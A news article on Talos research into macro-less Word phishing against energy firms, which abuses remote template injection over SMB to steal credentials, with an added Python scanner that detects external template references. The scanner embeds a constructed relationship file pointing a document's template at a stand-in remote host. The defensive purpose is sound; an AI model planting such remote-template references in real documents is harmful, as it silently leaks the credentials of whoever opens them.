Phishing emails aimed at stealing credentials from critical infrastructure firms can harvest them silently without using a single macro, researchers have warned.
Hackers are targeting energy companies, including those working in nuclear power and other critical infrastructure providers, with a technique that puts a new spin on a tried-and-tested form of cyberattack.
Phishing has long been a successful method of attack, with cybercriminals crafting a legitimate-looking email and sending it to the intended victim along with a malicious attachment. Once opened, the attachment runs code that drops malware, which can then be used for ransomware, data theft or another form of attack.
But now attackers are running phishing campaigns with no malicious code in the attachment at all. Instead the document uses template injection: it references an external template that Word fetches over an SMB connection when the file is opened, and that outbound connection is used to silently harvest credentials, according to researchers at Talos Intelligence.
While the attack method is currently only used to steal credentials, researchers warn it could be employed to drop other malware.
It's the latest in a string of attacks that rely on SMB, although, unlike Petya or WannaCry, this one exploits no flaw in the protocol (it abuses legitimate SMB behaviour) and has no known relation to EternalBlue, the leaked NSA Windows exploit that has been used to carry out global ransomware attacks.
Cyberattacks against critical infrastructure are not a new phenomenon, and since May 2017 hackers have been using this new technique to target energy companies around the world, predominantly in Europe and the US, with the goal of stealing the credentials of those working in critical infrastructure. It's not yet known who is behind the attacks or where they're based.
Like other phishing campaigns, this attack uses emails relevant to the targets as a lure. In this instance, the emails often claim to be environmental reports or a CV, and come with an attached Word document that attempts to harvest credentials when opened.
Researchers say these documents initially showed no indicators of compromise and none of the malicious macros associated with this sort of campaign. The documents contain no code; instead, the attachment references an external template hosted at a particular IP address, and Word retrieves it from that server over SMB when the document is opened. Because Windows will attempt to authenticate to a remote SMB server automatically, that outbound connection alone can hand the user's credential material to the attacker without any prompt.
The template fetch is what goes over SMB, but the phishing itself is handled over HTTPS: the user is shown a Basic Authentication prompt for their credentials, and whatever they type in is harvested.
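The mechanism described above can be checked for offline, because a .docx is just a zip archive whose `.rels` parts declare every external resource the document references. The following is an added example written for this article (it is not code from Talos or from the campaign): it constructs a minimal .docx in memory whose `word/_rels/settings.xml.rels` declares an attached template on a remote host, then scans every relationship part for external targets and classifies the transport Word would use to fetch them. The host address (203.0.113.5, from the documentation range), share and template names are constructed for the example.

```python
"""Scan a .docx for external template references (Word template injection).

Added example, not from the Talos report or the article. The .docx built
below and the remote address in it (203.0.113.5) are constructed samples.
"""
import io
import xml.etree.ElementTree as ET
import zipfile
from urllib.parse import urlparse

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
)

# Constructed: a settings.xml.rels that points the document's template at a
# remote host. Word resolves the file:// host as a UNC path and fetches it
# over SMB when the document is opened.
MALICIOUS_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}"
    Target="file://203.0.113.5/share/template.dotm" TargetMode="External"/>
</Relationships>
"""

# Constructed: the same relationship as Word writes it for an ordinary
# document based on a local template; no network fetch is involved.
BENIGN_RELS = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}"
    Target="file:///C:/Users/me/AppData/Roaming/Microsoft/Templates/Normal.dotm"
    TargetMode="External"/>
</Relationships>
"""


def build_docx(rels_xml: str) -> bytes:
    """Build a minimal .docx (a zip package) containing the parts we need."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/settings.xml", "<settings/>")
        z.writestr("word/_rels/settings.xml.rels", rels_xml)
    return buf.getvalue()


def classify_target(target: str) -> str:
    """Map a relationship Target to the transport Word would use to fetch it.

    A UNC path or a file:// URL with a host (or a file:///\\\\host form, which
    Word also emits) is fetched over SMB; http(s) targets are fetched over
    the web, where the server can demand Basic Authentication.
    """
    if target.startswith("\\\\"):
        return "smb"
    parsed = urlparse(target)
    if parsed.scheme == "file":
        if parsed.netloc or parsed.path.lstrip("/").startswith("\\\\"):
            return "smb"
        return "local"
    if parsed.scheme in ("http", "https"):
        return parsed.scheme
    return "other"


def external_template_targets(docx_bytes: bytes) -> list[dict]:
    """Return every relationship in the package that points off the local host."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode") != "External":
                    continue
                target = rel.get("Target", "")
                transport = classify_target(target)
                if transport == "local":
                    continue
                findings.append({
                    "part": name,
                    "type": rel.get("Type", "").rsplit("/", 1)[-1],
                    "target": target,
                    "transport": transport,
                })
    return findings


if __name__ == "__main__":
    for finding in external_template_targets(build_docx(MALICIOUS_RELS)):
        print(finding)
    print("benign sample:", external_template_targets(build_docx(BENIGN_RELS)))
```

The scanner deliberately reports any external relationship, not only `attachedTemplate`, because other relationship types (linked images, OLE objects) can trigger the same outbound fetch; the `transport` field tells you whether the egress to block is SMB (TCP 445) or HTTPS. A local `Normal.dotm` reference is not reported, so ordinary documents do not generate noise.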
Talos has responded to the attacks by contacting affected customers and ensuring “they were aware of and capable of responding to the threat”.
The researchers also say this threat “illustrates the importance of controlling your network traffic and not allowing outbound protocols such as SMB except where specifically required for your environment”.
However, Talos says it is unable to share all indicators of compromise or who specifically has been targeted due to "the nature in which we obtained intelligence related to these attacks".